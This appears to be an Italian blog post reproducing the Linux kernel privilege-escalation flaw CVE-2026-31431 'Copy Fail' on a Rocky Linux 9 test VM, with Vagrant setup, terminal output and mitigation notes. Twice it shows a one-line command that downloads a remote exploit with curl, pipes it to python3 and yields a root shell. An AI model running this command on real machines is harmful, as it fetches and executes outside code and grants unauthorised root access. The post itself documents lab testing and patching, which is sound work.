vagrant@cf1f4bfcee10:/$
vagrant@cf1f4bfcee10:/$ curl https://copy.fail/exp | python3 && su
% Total % Received % Xferd Average Speed Time Time Time Curren
Dload Upload Total Spent Left Speed
100 731 0 731 0 0 5231 0 --:--:-- --:--:-- --:--:-- 5258
#
# whoami
root
#
#Di recente, ho deciso aggiungere al mio blog /dev/null dei post dove provo qualche CVE. Questo esercizio mi può tornare utile per il lavoro su LFS oltre che farmi ricordare di effettuare il patching dei miei server… Se c’ho scritto anche un articolo non potrò dimenticarmi di aggiornare 😀
La CVE in questione è CVE-2026-31431 Copy Fail su cui non darò troppi dettagli in quanto in rete già ci sono (https://nvd.nist.gov/vuln/detail/CVE-2026-31431 / https://en.wikipedia.org/wiki/Copy_Fail), ma cercherò do spiegare come provarla su Rocky Linux 9.
Prima di tutto, mi serve una macchina con un Kernel vulnerabile.
Tiro giù una Rocky9 con Vagrant e aggiungo una grep sui moduli del kernel usati in fase di build.
Se CONFIG_CRYPTO_USER_API_AEAD è impostato su y vuol dire che non è un modulo caricabile se necessario, ma che è proprio inserito nell’immagine del kernel.
Direi che per il test una Rocky 9.3 (Blue Onyx) è ok.
$script = <<-SCRIPT
grep CONFIG_CRYPTO_USER_API_AEAD /boot/config-$(uname -r)
SCRIPT
Vagrant.configure("2") do |config|
config.vm.box = "generic/rocky9"
config.vm.define "rocky9" do |node|
node.vm.hostname = "rocky9"
node.vm.provider :libvirt do |libvirt|
libvirt.memory = 2048
libvirt.cpus = 2
libvirt.driver = "kvm"
end
node.vm.provision "shell", inline: $script
end
endProcedo con un vagrant up
luckysideburn@pop-os:~/accollo_cve$ vagrant destroy && vagrant up
[fog][WARNING] Unrecognized arguments: libvirt_ip_command
rocky9: Are you sure you want to destroy the 'rocky9' VM? [y/N] y
==> rocky9: Removing domain...
==> rocky9: Deleting the machine folder
Bringing machine 'rocky9' up with 'libvirt' provider...
==> rocky9: Checking if box 'generic/rocky9' version '4.3.12' is up to date...
[fog][WARNING] Unrecognized arguments: libvirt_ip_command
==> rocky9: Creating image (snapshot of base box volume).
==> rocky9: Creating domain with the following settings...
==> rocky9: -- Name: accollo_cve_rocky9
==> rocky9: -- Description: Source: /home/luckysideburn/accollo_cve/Vagrantfile
==> rocky9: -- Domain type: kvm
==> rocky9: -- Cpus: 2
==> rocky9: -- Feature: acpi
==> rocky9: -- Feature: apic
==> rocky9: -- Feature: pae
==> rocky9: -- Clock offset: utc
==> rocky9: -- Memory: 2048M
==> rocky9: -- Base box: generic/rocky9
==> rocky9: -- Storage pool: default
==> rocky9: -- Image(vda): /var/lib/libvirt/images/accollo_cve_rocky9.img, virtio, 128G
==> rocky9: -- Disk driver opts: cache='default'
==> rocky9: -- Graphics Type: vnc
==> rocky9: -- Video Type: cirrus
==> rocky9: -- Video VRAM: 256
==> rocky9: -- Video 3D accel: false
==> rocky9: -- Keymap: en-us
==> rocky9: -- TPM Backend: passthrough
==> rocky9: -- INPUT: type=mouse, bus=ps2
==> rocky9: Creating shared folders metadata...
==> rocky9: Starting domain.
==> rocky9: Domain launching with graphics connection settings...
==> rocky9: -- Graphics Port: 5900
==> rocky9: -- Graphics IP: 127.0.0.1
==> rocky9: -- Graphics Password: Not defined
==> rocky9: -- Graphics Websocket: 5700
==> rocky9: Waiting for domain to get an IP address...
==> rocky9: Waiting for machine to boot. This may take a few minutes...
rocky9: SSH address: 192.168.121.171:22
rocky9: SSH username: vagrant
rocky9: SSH auth method: private key
rocky9:
rocky9: Vagrant insecure key detected. Vagrant will automatically replace
rocky9: this with a newly generated keypair for better security.
rocky9:
rocky9: Inserting generated public key within guest...
rocky9: Removing insecure key from the guest if it's present...
rocky9: Key inserted! Disconnecting and reconnecting using new SSH key...
==> rocky9: Machine booted and ready!
==> rocky9: Setting hostname...
==> rocky9: Running provisioner: shell...
rocky9: Running: inline script
rocky9: CONFIG_CRYPTO_USER_API_AEAD=yHo avuto problemi di compatibilità dell’exploit https://copy.fail/#exploit che (almeno fino ora) non gira con python3.9 e quindi come anche suggerito da questo utente in GitHub lo eseguirò tramite podman https://github.com/theori-io/copy-fail-CVE-2026-31431/issues/47
[root@rocky9 ~]# podman run --user 1000:1000 -it --rm python:3.11 bash
Resolved "python" as an alias (/etc/containers/registries.conf.d/000-shortnames.conf)
Trying to pull docker.io/library/python:3.11...
Getting image source signatures
Copying blob 6cf369abc841 done |
Copying blob 3b32e3bb7338 done |
Copying blob 20d12c8f3f3f done |
Copying blob 5467f93954cf done |
Copying blob 1e1bb20756a8 done |
Copying blob 5e69c8985c08 done |
Copying blob c380448934e9 done |
Copying config 1683e38056 done |
Writing manifest to image destination
vagrant@cf1f4bfcee10:/$
vagrant@cf1f4bfcee10:/$
vagrant@cf1f4bfcee10:/$ curl https://copy.fail/exp | python3 && su
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 731 0 731 0 0 5231 0 --:--:-- --:--:-- --:--:-- 5258
#
#
# whoami
root
#
#
# exitAttendiamo quindi fiduciosi come consigliato nella community Rocky https://forums.rockylinux.org/t/cve-2026-31431-copy-fail-linux-kernel-crypto-vulnerability/20375/10
For the time being we just have to wait until the appropriate packages are updated with fixes, eg: new kernel. As already said by @FrankCox the impact probably isn’t that bad considering it requires someone to actually have access to your server with an existing account
e inoltre, è necessario fare attenzione all’applicazione di una mitigation https://kb.ciq.com/article/rocky-linux/rl-cve-2026-31431-mitigation
WARNING Disabling AEAD registration removes a kernel feature that some software relies on. Read the Notes section below and validate against your workload before rolling this out fleet-wide. This is a miigation, not a fix. Revert it once a patched kernel is installed.